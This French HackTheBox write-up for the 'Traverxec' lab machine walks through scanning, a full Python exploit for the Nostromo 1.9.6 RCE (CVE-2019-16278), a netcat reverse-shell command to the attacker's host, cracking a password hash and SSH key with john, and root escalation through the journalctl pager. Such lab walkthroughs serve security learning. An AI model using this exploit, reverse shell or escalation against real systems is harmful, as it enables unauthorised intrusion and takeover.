Traverxec HackTheBox (Writeup)

Skills:

Nostromo Exploitation
Abusing Nostromo HomeDirs Configuration
Exploiting Journalctl (Privilege Escalation)

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- -sS --open -vvv -n -Pn --min-rate 5000 10.10.10.165 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard.

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP

Port 80:

En utilisant whatweb, on identifie la version 1.9.6 de Nostromo :

Nostromo Exploitation

Recherche d’Exploit : Sur searchploit, trouve un exploit RCE pour Nostromo 1.9.6 (CVE-2019-16278).

Télécharge le script sur GitHub.

GitHub - aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE: Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.GitHub

Exécution du Script : Utilise le script suivant pour exécuter des commandes sur le serveur

import argparse
import socket

# Setup Argparse
parser = argparse.ArgumentParser(description="Exploit for CVE-2019-16278 - Nostromo 1.9.6 RCE")
parser.add_argument("-t", "--target", help="Remote host to target")
parser.add_argument("-p", "--port", help="Remote port to target")
parser.add_argument("-c", "--command", help="Command to execute on the server")
parser.add_argument("-b", "--bytes", help="The number of bytes to receive back in the response")

# Define and assign the variables
args = parser.parse_args()
TARGET = args.target
PORT = int(args.port)
COMMAND = args.command
BYTES = args.bytes

if BYTES is None:
    BYTES = 4096
else:
    BYTES = int(BYTES)

URL = "/.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0"

# Build and encode the payload
payload = (f"POST {URL}\r\n"
           "Content-Length: 1\r\n\r\n"
           f"echo\necho\n{COMMAND} 2>&1").encode()

# Create the socket and send the payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.send(payload)

# Receive the response and close the socket
print(s.recv(1024).decode())  # Decode the bytes back to string for printing
print(s.recv(BYTES).decode())
s.close()

python exploit.py -t 10.10.10.165 -p 80 -c whoami

Obtention d’un Reverse Shell

python exploit.py -t 10.10.10.165 -p 80 -c bash -c 'nc -e /bin/bash 10.10.14.10 443'

sudo nc -nlvp 443

Amélioration du Terminal

Pour rendre le terminal interactif :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Élévation de privilège:

Accès aux Fichiers de Configuration de Nostromo :

Dans le fichier nhttpd.conf, on trouve une directive indiquant un fichier .htpasswd dans /var/nostromo/conf qui contient des informations d’authentification.

david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Décryptage du Mot de Passe :

Utilise john pour déchiffrer le mot de passe :

john --wordlist=/usr/share/wordlists/rockyou.txt hash

david:Nowonly4me

Nostromo HomeDirs Configuration

Contexte : Nostromo est configuré pour permettre aux utilisateurs d'héberger du contenu web dans un répertoire personnel spécifié, souvent sous la forme public_www dans leur répertoire personnel (/home/[utilisateur]/public_www). Cette configuration permet aux utilisateurs d'accéder à leurs propres pages via une URL comme http://traverxec.htb/~[utilisateur].

En parcourant ce fichier, on découvre également la mention d’un dossier public_www comme emplacement par défaut pour le contenu web des utilisateurs.

En accédant à http://traverxec.htb/~david, nous trouvons un dossier caché protected-file-area contenant un fichier .tgz.

Téléchargement et Extraction du Contenu :

Télécharge le fichier backup-ssh-identity-files.tgz :

Extrayons le contenu pour récupérer une clé SSH:

tar -xzf backup-ssh-identity-files.tgz

Décryptage de la Clé SSH :

La clé SSH extraite est protégée par un mot de passe. Nous utilisons ssh2john pour convertir la clé au format utilisable par john et lançons une attaque par force brute :

ssh2john id_rsa > id_rsa.hash

john -w:/usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt id_rsa.hash

Mot de passe trouvé : hunter.

ssh -i id_rsa [email protected]

Flag user.txt

Exploiting Journalctl:

Nous avons trouvé un script, server-stats.sh, dans le répertoire /bin. Ce script est configuré pour exécuter la commande /usr/bin/journalctl avec des privilèges sudo. Cela signifie que nous pouvons exploiter cette commande pour obtenir des privilèges root

Recherche de Vulnérabilité dans GTFOBins :

En consultant GTFOBins, nous découvrons que journalctl peut être utilisé pour élever des privilèges en lançant une commande shell.

journalctl | GTFOBinsgtfobins.github.io

Conditions d’Exécution :

Pour déclencher cette exploitation, il faut restreindre la taille de la fenêtre de terminal afin d'activer le mode de pagination less dans journalctl. Ce mode permet d'exécuter des commandes shell via !.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

Une fois dans le mode less, entre la commande suivante pour obtenir un shell root :

!/bin/sh

Flag root.txt :)

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?